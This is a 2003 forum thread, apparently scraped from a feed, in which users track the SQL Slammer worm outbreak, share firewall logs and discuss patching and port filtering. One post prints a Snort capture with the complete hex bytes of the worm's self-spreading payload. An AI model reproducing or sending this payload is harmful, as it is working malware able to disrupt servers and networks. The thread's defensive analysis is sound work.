Source: »www.dials.ru/english/inf/news.php?id=293]]> http://www.dslreports.com/forum/remark,5777672 Sat, 25 Jan 2003 16:20:45 EDT http://www.dslreports.com/forum/remark,5777601 dja :

said by detonation$ :

---

Has most of you guys speed returned to normal status or still feeling the slow speed effect?

---

My speed is 300KB/sec, so it appears to be back to normal.
:)
--
Bushwacked!]]> http://www.dslreports.com/forum/remark,5777601 Sat, 25 Jan 2003 16:14:50 EDT http://www.dslreports.com/forum/remark,5777592 metrodust : nothing but normal here. never really felt the impact of it. ]]> http://www.dslreports.com/forum/remark,5777592 Sat, 25 Jan 2003 16:14:10 EDT http://www.dslreports.com/forum/remark,5777570 psloss :

said by Symantec Security:

---

Systems Not Affected: Windows 3.x, Windows 95, Windows 98, Windows Me, Microsoft IIS, Macintosh, OS/2, UNIX, Linux
CVE References: CAN-2002-0649

---

Well, actually any OS that can install MSDE 2000 could be affected, as this screenshot shows. I loaded MSDE 2000 on a test WinME install, snagged the worm blob from my collector, disconnected the box from the LAN, fired the blob at the loopback IP and the result is what you see above. Note the CPU race on the SQL Server process...

Philip Sloss
--
Feedback? e-mail: stuff@lupwa.org

]]> http://www.dslreports.com/forum/remark,5777570 Sat, 25 Jan 2003 16:11:41 EDT http://www.dslreports.com/forum/remark,5777561 detonation$ : Has most of you guys speed returned to normal status or still feeling the slow speed effect?]]> http://www.dslreports.com/forum/remark,5777561 Sat, 25 Jan 2003 16:10:54 EDT http://www.dslreports.com/forum/remark,5777327 hanz1 : looks like I've been hit 17 times. Thank you el cheapo zone alarm! :)]]> http://www.dslreports.com/forum/remark,5777327 Sat, 25 Jan 2003 15:47:07 EDT http://www.dslreports.com/forum/remark,5777075 scottkeen : Oh. So this is why my co-lo is timing out.

I have SP2 on my SQL server at the co-lo. I'll install SP3 as soon as I can get a TS connection to my server.

Question: How do I disable the SQL Server Monitoring service that uses port 1434? Is it just a Windows service that I set to Disable or Manual?

I do need 1433 so I can remote manage the SQL Server databases -- but I do not need 1434, correct?

Thanks
[text was edited by author 2003-01-25 15:58:19]
]]> http://www.dslreports.com/forum/remark,5777075 Sat, 25 Jan 2003 15:18:17 EDT http://www.dslreports.com/forum/remark,5777034 anon : funny thing is...someone on here said "mysql" but its really mssql (microsoft sql server) that is affected.]]> http://www.dslreports.com/forum/remark,5777034 Sat, 25 Jan 2003 15:13:48 EDT http://www.dslreports.com/forum/remark,5776780 inTulsa : Cool how so many resources get focused into something so useful right here in these forums.]]> http://www.dslreports.com/forum/remark,5776780 Sat, 25 Jan 2003 14:51:11 EDT http://www.dslreports.com/forum/remark,5776754 Randy Bell : Symantec Security Response - W32.SQLExp.Worm

W32.SQLExp.Worm is a worm that targets servers running Microsoft SQL. The worm sends 376 bytes to 1434/udp - the SQL Server Resolution Service Port. Beginning at 5:31am GMT, we started to see a significant increase in the unique number of source IPs scanning for 1434/udp. Symantec Security Response highly recommends all MS-SQL server system administrators to audit their machines for known security vulnerabilities immediately.

Symantec Security Response also recommends configuring perimeter devices to block 1434/udp traffic from untrusted hosts.

Symantec Security Response is currently developing a removal tool for W32.SQLExp.Worm. Because the worm is only resident in memory, and is not written to disk, this threat is not detectable using virus definitions. Customers are recommended to follow the measures described above in order to deal with this threat.

The worm has the unintended payload of performing a Denial of Service due to the large number of packets it sends out.

Also Known As: SQL Slammer Worm [ISS], DDOS.SQLP1434.A [Trend], W32/SQLSlammer [McAfee]
Type: Worm
Infection Length: 376 bytes
Systems Affected: Windows NT, Windows 2000, Windows XP
Systems Not Affected: Windows 3.x, Windows 95, Windows 98, Windows Me, Microsoft IIS, Macintosh, OS/2, UNIX, Linux
CVE References: CAN-2002-0649
--
"But now abide faith, hope, love, these three; but the greatest of these is love." (1 Cor. 13:13)

]]> http://www.dslreports.com/forum/remark,5776754 Sat, 25 Jan 2003 14:49:37 EDT http://www.dslreports.com/forum/remark,5776744 justin : caught CNN in the store and of course they have making a huge meal about it. "Could it be terrorism, steve?" "well, its too early to say but its certainly possibkle". blah blah yada yada.]]> http://www.dslreports.com/forum/remark,5776744 Sat, 25 Jan 2003 14:48:47 EDT http://www.dslreports.com/forum/remark,5776741 evansc : :[ I miss my Link Logger! Wish I could see what's going on on my home WAN port.
This is an e-mail I got from my web host

quote:

---

News:
Traffic on the many parts of the Internet slowed dramatically for several hours early Saturday, the apparent
effects of a fast-spreading, virus-like infection that overwhelmed the world's digital pipelines
and interfered with Web browsing and delivery of e-mail and other services.

The virus-like attack, which began about 12:30 a.m. EST, sought out vulnerable computers on the Internet to
infect using a known flaw in popular database software from Microsoft, called "SQL Server 2000." But the
attacking software code was scanning for victim computers so randomly and so
aggressively -- sending out thousands of probes each second -- that it overwhelmed many Internet data pipelines.

Read more URL
-- »www.cnn.com/2003/TECH/internet/0···dex.html

-- »www.eeye.com/html/Research/Flash···125.html

-- »securityresponse.symantec.com/av···orm.html

-- »news.yahoo.com/news?tmpl=story2&···95573501

The situation was brought under control at approximately 7a.m. EST. Though the Internet is still experiencing severe amounts of degradation things have greatly improved .

System Administration

---

--
Evans C, MCP
PC Load Letter Tray 2]]> http://www.dslreports.com/forum/remark,5776741 Sat, 25 Jan 2003 14:48:15 EDT http://www.dslreports.com/forum/remark,5776738 metrodust :

said by woodward :

---

All at once this one invaded our colocation facility and infected most every IIS ans MS SQL server in there. DoS'd us right off the internet with about 80 GB of data within minutes until we blocked the port at the border and yanked a few cords.

This one could be really nasty.

---

why would you have that port open in the first place??]]> http://www.dslreports.com/forum/remark,5776738 Sat, 25 Jan 2003 14:47:45 EDT http://www.dslreports.com/forum/remark,5776713 IGGY : I received the same email. But I'm on the mailing list for that site.
bink@bink.nu
Saturday, January 25, 2003 5:14 AM
BinkNewsLetter
[binknewsflash] | WARNING!! patch your SQL server now!

Keep looking at »winxp.bink.nu for more info as this will develop further

(my email address) This is a posting from the
BinkNewsFlash List. To unsubscribe, forward this message (Including these lines) to = won't show the email address lol. Oh well it's a legit site all the same. Go there & unsubscribe from the email list if the content isn't wanted or needed.
[text was edited by author 2003-01-25 14:50:15]]]> http://www.dslreports.com/forum/remark,5776713 Sat, 25 Jan 2003 14:45:56 EDT http://www.dslreports.com/forum/remark,5776701 ATLJ : I was receiving tons of scans by this until about an hour ago when they suddenly stopped. Did Earthlink possibly block UDP port 1434 on their network?
--
"If the facts don't fit the theory, change the facts." - Albert Einstein]]> http://www.dslreports.com/forum/remark,5776701 Sat, 25 Jan 2003 14:44:57 EDT http://www.dslreports.com/forum/remark,5776681 Marilla :

said by Rhobite :

---

Scott, if Bink sent that out it's not spam. He runs the site winxp.bink.nu which is a great Windows resource. You are probably on his mailing list, or someone copied it off his page and sent it to you.

---

Yeah.. the information contained is accurate as far as it goes.. but for someone not expecting to recieve warnings about server-related vulnerabilities, it might not stress enough that it only applies to people running the specific server software noted.

If notification of such things is not something you really need, you may want to get off that mailing list if you are on it, or investigate how you got the e-mail if you aren't on the list.]]> http://www.dslreports.com/forum/remark,5776681 Sat, 25 Jan 2003 14:42:57 EDT http://www.dslreports.com/forum/remark,5776608 Rhobite : Scott, if Bink sent that out it's not spam. He runs the site winxp.bink.nu which is a great Windows resource. You are probably on his mailing list, or someone copied it off his page and sent it to you.]]> http://www.dslreports.com/forum/remark,5776608 Sat, 25 Jan 2003 14:34:06 EDT http://www.dslreports.com/forum/remark,5776392 Marilla :

said by psloss :

---

The worm is purely memory resident, so it can be "cleaned" by rebooting (or shutting down the SQL Server processes). But an unpatched system connected to the Internet will get reinfected probably within minutes of rebooting.

---

Thanks for stating that for me. I'm trying to get in touch with a human being at my co-location spot to make sure someone will be there if I make the 2 hour trip to go, so I can patch and reboot the thing... but having difficulty. Just to be safe, I'm going to bring a full 'recovery kit', but it's nice to not be thinking that this is what I'll have to do when I get there.

*sigh*]]> http://www.dslreports.com/forum/remark,5776392 Sat, 25 Jan 2003 14:11:08 EDT http://www.dslreports.com/forum/remark,5776351 psloss :

said by Scott :

---

Nope I am on XP. I think this is SPAM. lol

---

Sounds like it, sort of. Have you gone to that site before? If you happen to have UDP port 1434 bound, then you might have been scanned and they assumed your box was infected...haven't heard of them before, but I'll take a look out of curiosity...

Add: well, actually, I had...Steven Bink's site, he got sued by Microsoft recently (a nice frivolous suit, too).

Philip Sloss

[text was edited by author 2003-01-25 14:14:21]
]]> http://www.dslreports.com/forum/remark,5776351 Sat, 25 Jan 2003 14:07:15 EDT http://www.dslreports.com/forum/remark,5776143 Scott : Nope I am on XP. I think this is SPAM. lol]]> http://www.dslreports.com/forum/remark,5776143 Sat, 25 Jan 2003 13:48:16 EDT http://www.dslreports.com/forum/remark,5776129 psloss :

said by Scott :

---

About this.
Is it real? Should I do what it says.
I just got this email from bink@bink.nu

---

If you're sure that you have a system running SQL Server 2000 or MSDE 2000, I'd at least verify that the system is either infected or vulnerable before taking action. Once the worm gets going on a system, there should be a noticeable effect on the network and CPU usage of the system.

The worm is purely memory resident, so it can be "cleaned" by rebooting (or shutting down the SQL Server processes). But an unpatched system connected to the Internet will get reinfected probably within minutes of rebooting.

If you do verify that, then I think the system should be taken offline as soon as possible and patched using your system updating procedures.

Philip Sloss
--
Feedback? e-mail: stuff@lupwa.org ]]> http://www.dslreports.com/forum/remark,5776129 Sat, 25 Jan 2003 13:46:47 EDT http://www.dslreports.com/forum/remark,5776027 IGGY : I've updated this page »www.iggyz.com/files/Bookmarkz/antivirus.html with multiple links to news stories related to this latest attack. It also has links to a few of the related CERT advisories.]]> http://www.dslreports.com/forum/remark,5776027 Sat, 25 Jan 2003 13:37:55 EDT http://www.dslreports.com/forum/remark,5775998 Scott : About this.
Is it real? Should I do what it says.
I just got this email from bink@bink.nu

WARNING! SQL Server worm on the loose!!!!!!!!!!!
you have a sql server connected to the Internet? READ!
Friday night it seems a SQL server worm broke out and its coming in on SQL port 1434 then flooding it and bringing the server to its knees and won't respond to other services. shut it off and patch NOW. It seems to have impact in whole Internet performance.

CERT-CC Vulnerability Note VU#370308

Reachability %

SecurityFocus HOME Mailing List BugTraq

Microsoft Security Bulletin MS02-039 and get the patch

Or install SP3 NOW !!!!! Download SQL Server 2000 SP3...

I'm not 100% sure about this matter at the moment but better patch / prevent.

Spread this warning !!!!!!!

Keep looking at »winxp.bink.nu for more info as this will develop further
--
Scott@Dslr.net]]> http://www.dslreports.com/forum/remark,5775998 Sat, 25 Jan 2003 13:35:07 EDT http://www.dslreports.com/forum/remark,5775928 miketavares :

said by SxTX :

---

I love this !!! Microsoft sucks so bad Every OS and server application has multiple vulnerabilities. Microsofts weak security took me out of business due to DDOS attacks. I hope this one teaches them a lesson.

---

why didn't you patch your server 6 months ago when the patch was released?
--
"In Nukes we trust" Copyright 2003 by miketavares]]> http://www.dslreports.com/forum/remark,5775928 Sat, 25 Jan 2003 13:28:04 EDT http://www.dslreports.com/forum/remark,5775899 poiwv : So we are back again to...

It's not a bug, it's a FEATURE!!!!!!!]]> http://www.dslreports.com/forum/remark,5775899 Sat, 25 Jan 2003 13:25:25 EDT http://www.dslreports.com/forum/remark,5775895 miketavares :

said by l008com:

---

Wow I sure am glad I'm running MySQL on Mac OS X.
I can't wait to hear the crap MS is going to get tomorrow...

---

The Network admins and SQL admins should be the getting the crap on this. The patch has been available since JULY 2002. No reason for any box to be unpatched after 6 months.
--
"In Nukes we trust" Copyright 2003 by miketavares]]> http://www.dslreports.com/forum/remark,5775895 Sat, 25 Jan 2003 13:24:54 EDT http://www.dslreports.com/forum/remark,5775893 number1melon : my computer is gettting requests on that port like theres no tormorrow!!]]> http://www.dslreports.com/forum/remark,5775893 Sat, 25 Jan 2003 13:24:50 EDT http://www.dslreports.com/forum/remark,5775817 justin : Its also odd to choose UDP. UDP is unreliable. There is no guarantee the packet will arrive. What happens then? Why does these guys often sound like they live inside a hermetically sealed office, with their own geek language, and insist on always doing things their way even if that means they make old mistakes new again?]]> http://www.dslreports.com/forum/remark,5775817 Sat, 25 Jan 2003 13:16:18 EDT http://www.dslreports.com/forum/remark,5775777 poiwv :

quote:

---

All computers running an instance of SQL Server 2000
listen on this port. When a client Dbnetlib.dll connects to this port, the server returns a packet listing all the instances running on the server. For each instance, the packet reports the server Net-Libraries and network addresses the instance is listening on....


So the UDP 1434 port is open when the SQL Server is started to listen all the clients with any IP address on this port. SQL Server only receives the packet from the client on this port to determine which instance the client attempts to access and return the related information of the SQL Server to the clients. Then, the clients can create the connection to the SQL Server with the protocol enabled on the server side.

---

huh????

No, not the writing (even though that is none to clear), the reasoning/logic for the why.

It seems to me that the writer is saying we did it this way because it was easier for .net.
And do any of the other SQL products out there do the same thing?
--
Advertising may be described as the science of arresting the human intelligence long enough to get money from it.

[text was edited by author 2003-01-25 13:14:36]
]]> http://www.dslreports.com/forum/remark,5775777 Sat, 25 Jan 2003 13:11:33 EDT http://www.dslreports.com/forum/remark,5775704 justin : I got a warning from our data center:

 
There is currently an issue with many of the internets servers spawning
traffic to random addresses on UDP port 1434.
 
This is causing excess traffic and latency on all major internet backbones
worldwide.
 
At this time we do not know the cause of this but we suspect it is a problem
with Microsoft SQL Server 2000 machines. The only known resolution is to
firewall port 1434 to and from your server (to prevent being "infected"
again), and reboot. At this time this is still speculation, but after
about 1 and 1/2 hours of troubleshooting and diagnosis, and actually
performing the steps listed above on several servers, the problems have
gone away. More details to follow shortly.

then I found this:
»dbforums.com/showthread.php?threadid=484654

where an MS engineer tries to explain why port 1434 is open for SQL servers. And does very poorly. Seems like something nasty came home to roost.

edit: oh later they emailed these links

»www.boredom.org/~cstone/worm-annotated.txt
»bvlive01.iss.net/issEn/delivery/···d=21824

[text was edited by author 2003-01-25 13:09:37]]]> http://www.dslreports.com/forum/remark,5775704 Sat, 25 Jan 2003 13:03:11 EDT http://www.dslreports.com/forum/remark,5775701 lestat99 : For procedures on how to mitigate this worm see:

»www.packetdefense.com]]> http://www.dslreports.com/forum/remark,5775701 Sat, 25 Jan 2003 13:03:02 EDT http://www.dslreports.com/forum/remark,5775682 poiwv : Yes, it is software that is installed. For the most part it is only used on servers, mostly by businesses and universities.

quote:

---

SQL is an ANSI standard language for accessing databases! In our SQL tutorial you will learn how to use SQL to access, define, and manipulate the data in a database system, like Oracle, DB2, Sybase, Informix, Microsoft SQL Server, Access, and others.

---

The product that seems to the the one that is affected is the MicrosoftSQL Server.
--
Advertising may be described as the science of arresting the human intelligence long enough to get money from it. ]]> http://www.dslreports.com/forum/remark,5775682 Sat, 25 Jan 2003 13:00:59 EDT http://www.dslreports.com/forum/remark,5775672 TKJunkMail :

said by muf :

---

In fact i don't even know what this SQL thing is, never heard of it before until today. Could someone please enlighten me.

---

Here is a link to what SQL Server is: »www.microsoft.com/sql/evaluation···ault.asp

It generally only runs on internet servers and is used by many businesses to perform database inquiries. Your system wouldn't be affected.

As to why things might slow down, the internet, for a couple of hours, was filled with billions of extra messages that clogged up some of the main internet routers. So if you were accessing certain web sites, response time might have been impacted.
--
I found out that all the important lessons of life are contained in the three rules for achieving a perfect golf swing: 1.Keep your head down - 2. Follow through - 3. Be born with money]]> http://www.dslreports.com/forum/remark,5775672 Sat, 25 Jan 2003 12:59:26 EDT http://www.dslreports.com/forum/remark,5775671 tons of fun : Thank goodness.....it is almost over!!

Be well...]]> http://www.dslreports.com/forum/remark,5775671 Sat, 25 Jan 2003 12:59:20 EDT http://www.dslreports.com/forum/remark,5775670 muf : Ah ok, I'm very lucky then. Hope everything gets sorted soon for the ppl that are affected.

muf]]> http://www.dslreports.com/forum/remark,5775670 Sat, 25 Jan 2003 12:58:52 EDT http://www.dslreports.com/forum/remark,5775617 hescominsoon$ : you do not have to worry about it running ME....if you have not noticed a slowdown then count yourself lucky...but many of us have noticed. Also if you just came online many network admins have got the traffic under control by blocking the port this worm is using...when i first came on at around 7am this morning EST i noticed things were quite slow..it is now almost 1pm EST and things are pretty much back to normal due to port filtering by network admins.
--
God Bless »www.faithwalk.org]]> http://www.dslreports.com/forum/remark,5775617 Sat, 25 Jan 2003 12:54:16 EDT http://www.dslreports.com/forum/remark,5775593 muf : Sorry to sound so noobish but i've read all this and really am confused at what you are all going on about. I've been using the net over the last 2 days and noticed no difference whatsoever. In fact i don't even know what this SQL thing is, never heard of it before until today. Could someone please enlighten me. Is it some software you install like outlook express or is it something built in to windows, or is it to do with servers only and not personal pc's at all? I'm on Windows ME.

muf]]> http://www.dslreports.com/forum/remark,5775593 Sat, 25 Jan 2003 12:51:10 EDT http://www.dslreports.com/forum/remark,5775564 cbcalhoun : I have only got one hit so far on my firewall...

Jan 25 08:20:38 f1 kernel: Packet log: input DENY eth0 PROTO=17 10.230.32.164:3649 209.41.225.3:1434 L=404 S=0x00 I=37424 F=0x0000 T=118 (#10) ]]> http://www.dslreports.com/forum/remark,5775564 Sat, 25 Jan 2003 12:47:57 EDT http://www.dslreports.com/forum/remark,5775507 mastermind278 : This has nothing to do with XP, is MS SQL Server 2000, mostly runed on Windows 2000.
--
Mastermind 4 Life ® ™ © ]]> http://www.dslreports.com/forum/remark,5775507 Sat, 25 Jan 2003 12:41:35 EDT http://www.dslreports.com/forum/remark,5775488 detonation$ : Now maybe SP2 is on the way for XP?]]> http://www.dslreports.com/forum/remark,5775488 Sat, 25 Jan 2003 12:39:08 EDT http://www.dslreports.com/forum/remark,5775465 Feivel1 : After my old ISPs (Texas and Michigan), I am MAJORLY impressed.
--
Feivel]]> http://www.dslreports.com/forum/remark,5775465 Sat, 25 Jan 2003 12:36:58 EDT http://www.dslreports.com/forum/remark,5775445 psloss :

said by Krispy :

---

Many providers have already filtered 1434/udp, most of the core providers had it done by about 5am EST. We are currently discussing filtering it on our network. The quick action of many providers is hampering the worms effects.

---

Cool. That'll impede any copycat attempts, too. Although my guess is that a lot of the systems that were infected by this are also infected by at least one other worm. myNetWatchman is being relocated today (good timing, eh?), but before it went offline I checked a couple of IPs and they had multiple incidents. One had an Opaserv infection, which implies they are running MSDE 2000 on a Win9x box. They still need badly to be patched.

Good news about the filtering.

Thanks,

Philip Sloss
--
Feedback? e-mail: stuff@lupwa.org ]]> http://www.dslreports.com/forum/remark,5775445 Sat, 25 Jan 2003 12:35:50 EDT http://www.dslreports.com/forum/remark,5775440 poiwv : I find it kind of interesting with some of the instiutions/businesses involved in where my initial hit came from that they are running an unpatched SQL.
--
Advertising may be described as the science of arresting the human intelligence long enough to get money from it. ]]> http://www.dslreports.com/forum/remark,5775440 Sat, 25 Jan 2003 12:35:21 EDT http://www.dslreports.com/forum/remark,5775432 Krispy :

said by Feivel1:

---

It does make me wonder though, why did they apparently filter the port BEFORE the attack or BEFORE most any other ISP? Could there have been some type of warning that we are not aware of?

---

There are non-public advisories that are usually ahead of public advisories, seems Earthlink is one of the clueful and is aware of these advisories...many thanks have to go out to the many techs that sacrificed their Friday night and helped get this thing under control in relatively short order.]]> http://www.dslreports.com/forum/remark,5775432 Sat, 25 Jan 2003 12:35:02 EDT http://www.dslreports.com/forum/remark,5775387 psloss :

said by poiwv :

---

So could we be seeing the initial start around 12:30 am?

---

I believe that's how it was reported by the Associated Press. For what it's worth, my first event was from a different IP.

Philip Sloss
--
Feedback? e-mail: stuff@lupwa.org ]]> http://www.dslreports.com/forum/remark,5775387 Sat, 25 Jan 2003 12:30:45 EDT http://www.dslreports.com/forum/remark,5775363 Feivel1 : Strange, it seems Earthlink is filtering port 1434 (or their upstream) because I have not had a hit on port 1434. The only symptom I saw was apparently a DNS problem reaching certain sites but even that was intermittant (could load BBR on attempts 1,3,4,6 but not on 2,5). Even that is totally clear at the moment. Guess I should be glad to have Earthlink. It does make me wonder though, why did they apparently filter the port BEFORE the attack or BEFORE most any other ISP? Could there have been some type of warning that we are not aware of?
--
Feivel]]> http://www.dslreports.com/forum/remark,5775363 Sat, 25 Jan 2003 12:28:58 EDT http://www.dslreports.com/forum/remark,5775357 graysonf : Here's how hard I've been hit on UDP 1434.

]]> http://www.dslreports.com/forum/remark,5775357 Sat, 25 Jan 2003 12:28:12 EDT http://www.dslreports.com/forum/remark,5775350 Krispy :

said by psloss:

---

Is anybody seeing a reduction in the number of hits? It's down noticeably in the last hour or two, so I'm wondering if ISPs are starting to block that port.

---

Many providers have already filtered 1434/udp, most of the core providers had it done by about 5am EST. We are currently discussing filtering it on our network. The quick action of many providers is hampering the worms effects.]]> http://www.dslreports.com/forum/remark,5775350 Sat, 25 Jan 2003 12:27:23 EDT http://www.dslreports.com/forum/remark,5775326 poiwv : That Ip address for the intial hit I saw proves very interesting.

Los Nettos, a LA/So Cal provider made up of:

Los Nettos Members

The consortium is made up of premier research and educational institutions in the Los Angeles area.

* California Institute of Technology
* Information Sciences Institute
* The Jet Propulsion Laboratory
* TRW
* University of Southern California
* Centergate Research

So could we be seeing the initial start around 12:30 am?
[text was edited by author 2003-01-25 12:27:54]
]]> http://www.dslreports.com/forum/remark,5775326 Sat, 25 Jan 2003 12:25:34 EDT http://www.dslreports.com/forum/remark,5775259 NicoleDiana6 : All of my attacks have abruptly stopped this morning. I hope that means this mess is over with.
--
"I don't have an attitude problem. You have a perception problem."]]> http://www.dslreports.com/forum/remark,5775259 Sat, 25 Jan 2003 12:18:19 EDT http://www.dslreports.com/forum/remark,5775242 psloss :

said by poiwv :

---

Anyone notice anything before 1:00 am (est), other than me?

---

The first event I recorded was at 5:31:06 UTC, which I think works out to 00:31:06 EST.

Philip Sloss
--
Feedback? e-mail: stuff@lupwa.org ]]> http://www.dslreports.com/forum/remark,5775242 Sat, 25 Jan 2003 12:16:13 EDT http://www.dslreports.com/forum/remark,5775202 poiwv : Anyone notice anything before 1:00 am (est), other than me?

25/01/03 00:30:52 -5:00 GMT UDP 206.117.169.219:3966 65.xxx.xxx.xxx:1434
--
Advertising may be described as the science of arresting the human intelligence long enough to get money from it. ]]> http://www.dslreports.com/forum/remark,5775202 Sat, 25 Jan 2003 12:11:35 EDT http://www.dslreports.com/forum/remark,5775201 psloss :

said by TKJunkMail :

---

It looks like UUNET, which still services the majority of universities is getting hit the worst. Most of the major backbone networks are running OK, however.

---

Is anybody seeing a reduction in the number of hits? It's down noticeably in the last hour or two, so I'm wondering if ISPs are starting to block that port.

Thanks,

Philip Sloss
--
Feedback? e-mail: stuff@lupwa.org ]]> http://www.dslreports.com/forum/remark,5775201 Sat, 25 Jan 2003 12:11:31 EDT http://www.dslreports.com/forum/remark,5775170 Wildcatt : Cnn reporting some type of sql virus attack

»www.cnn.com/2003/TECH/internet/0···dex.html]]> http://www.dslreports.com/forum/remark,5775170 Sat, 25 Jan 2003 12:07:55 EDT http://www.dslreports.com/forum/remark,5775139 acid343211 :

said by No Name5 :

---

Yes I thought it was just me about 30 minutes ago got same thing. Rarely see much activity on Qwest vdsl. Every minute or so. Started around 10:33pm AZ time all remote IPs are different.

[text was edited by author 2003-01-25 01:18:32]

---

This is why

»www.msnbc.com/news/864184.asp?0cm=c10

Jan. 25 — Traffic on the many parts of the Internet slowed dramatically for hours early Saturday, the apparent effects of a quick-spreading, virus-like infection that overwhelmed the world’s digital pipelines and interfered with Web browsing and delivery of e-mail.

acid
peace:)
--
]]> http://www.dslreports.com/forum/remark,5775139 Sat, 25 Jan 2003 12:04:16 EDT http://www.dslreports.com/forum/remark,5775111 TKJunkMail : It looks like UUNET, which still services the majority of universities is getting hit the worst. Most of the major backbone networks are running OK, however. See attached picture.

]]> http://www.dslreports.com/forum/remark,5775111 Sat, 25 Jan 2003 12:00:09 EDT http://www.dslreports.com/forum/remark,5774897 psloss : I'm still thinking about copycats in the coming days, a la Code Red...

Thanks to inTulsa for posting the link to David Litchfield's advisory...looks like this is using the stack overrun. Interesting...there was a presentation on this at BlackHat -- note that this presentation was made AFTER release of the patches. The presentation goes into these vulnerabilities in more depth...one wonders if the seed was planted there...

Philip Sloss
--
Feedback? e-mail: stuff@lupwa.org ]]> http://www.dslreports.com/forum/remark,5774897 Sat, 25 Jan 2003 11:37:20 EDT http://www.dslreports.com/forum/remark,5774841 Old Computer : Europe still under the fire...
Since 07h10 GMT time I got more than 2500 hits to port 1434 (UDP) and for now slower, just 23 for 10 past minutes.. :(]]> http://www.dslreports.com/forum/remark,5774841 Sat, 25 Jan 2003 11:28:54 EDT http://www.dslreports.com/forum/remark,5774800 Mark : Like I said earlier, theres no permanent payload, it is memory resident and will last until a restart. It just causes the unpatched SQL server to send out loads of malicious packets, which causes other unpatched SQL servers to do the same when they receive this packet. This has an effect of creating a world wide denial of service. Once a machine is reboot, it will stop sending packets, although if left unsecure the probability of re-infection is high.
[text was edited by author 2003-01-25 11:27:02]
]]> http://www.dslreports.com/forum/remark,5774800 Sat, 25 Jan 2003 11:23:06 EDT http://www.dslreports.com/forum/remark,5774794 newview : WallReViewer - as of 01/25/2003 11:18:53 AM Eastern Standard Time (Timestamps are UTC)
Date Time Dir Rem IP Addr Remote Name R Port Lcl IP Addr L Port
2003/01/25 13:36:37 I 138.143.250.58 2265 192.168.1.200 1434

01/25/03 11:19:38 dns 138.143.250.58
nslookup 138.143.250.58
Canonical name: nctamslant.navy.mil
Addresses: 138.143.250.58
--
The Rules of Spam | Maryland's New Anti-Spam Law
Where are we going? And what's with the hand basket?]]> http://www.dslreports.com/forum/remark,5774794 Sat, 25 Jan 2003 11:22:11 EDT http://www.dslreports.com/forum/remark,5774773 pH1 : -*> Snort! 0:60:xx:7B:3E:7A type:0x800 len:0x1A2
218.30.21.193:1187 -> 24.141.223.xx:1434 UDP TTL:108 TOS:0x0 ID:30531 IpLen:20 DgmLen:404
Len: 384
04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
01 DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE ....B.........p.
42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9 B.p.B........h..
B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01 .B.....1...P..5.
01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33 ...P..Qh.dllhel3
32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B 2hkernQhounthick
43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64 ChGetTf.llQh32.d
68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66 hws2_f.etQhsockf
B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45 .toQhsend....B.E
D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50 .P..P.E.P.E.P..P
BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05 ....B....=U..Qt.
BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1 ....B....1.QQP..
03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B ..........Q.E.P.
45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45 E.P..j.j.j...P.E
C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61 .P.E.P........a
D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2 ...E...@........
C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D ...).......E.j..
45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50 E.P1.Qf..x.Q.E.P
8B 45 AC 50 FF D6 EB CA .E.P....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

In case anyone cares. :)]]> http://www.dslreports.com/forum/remark,5774773 Sat, 25 Jan 2003 11:19:00 EDT http://www.dslreports.com/forum/remark,5774658 robre : LOL, thanks for that, I just realized the mistake I made in my attempted disassembly. I needed to use a 32 bit disassembler!

Officially brain damaged,
robre]]> http://www.dslreports.com/forum/remark,5774658 Sat, 25 Jan 2003 11:05:26 EDT http://www.dslreports.com/forum/remark,5774646 mastermind278 : Saturday, January 25, 2003 4:09:17 AM Unrecognized access from 15.36.154.120:3422 to UDP port 1434

Yep, HP has attacked me already.
--
Mastermind 4 Life ® ™ © ]]> http://www.dslreports.com/forum/remark,5774646 Sat, 25 Jan 2003 11:04:58 EDT http://www.dslreports.com/forum/remark,5774634 robre : If you look back I was hit by another one of hp machines near the begining of this :( pretty sad. I thought it was pretty pathetic, but wasn't really surprised at all.

And if you are playing Battlefield 1942 ping spikes of 1030 without the worm because it's netcode completely blows the goats.]]> http://www.dslreports.com/forum/remark,5774634 Sat, 25 Jan 2003 11:03:24 EDT http://www.dslreports.com/forum/remark,5774632 psloss : Apologies if this is a redundant post; just wanted to point out the Eeye disassembly. This is a tiny little bugger (they call it Sapphire):
»www.eeye.com/html/Research/Flash···hire.txt

Here's their advisory...
»www.eeye.com/html/Research/Flash···125.html

Anybody know how big this buffer overrun vulnerability (not this worm) is (in bytes)? In other words, can copycats do much more than this or is the buffer small enough that there's not much room to work with?

(BTW, "good" timing by the author...Super Bowl weekend.)

Thanks,

Philip Sloss
--
Feedback? e-mail: stuff@lupwa.org ]]> http://www.dslreports.com/forum/remark,5774632 Sat, 25 Jan 2003 11:03:00 EDT http://www.dslreports.com/forum/remark,5774568 vizionblind : playing battlefield 1942 last night and my ping as well as others skyrocketed to 1030
--
My music composings »www.mp3.com/buliwyf]]> http://www.dslreports.com/forum/remark,5774568 Sat, 25 Jan 2003 10:54:18 EDT http://www.dslreports.com/forum/remark,5774513 anon : Well HP have been infected!

Multiple scans from 15.27.102.5 (hpdm.gr.hp.com)

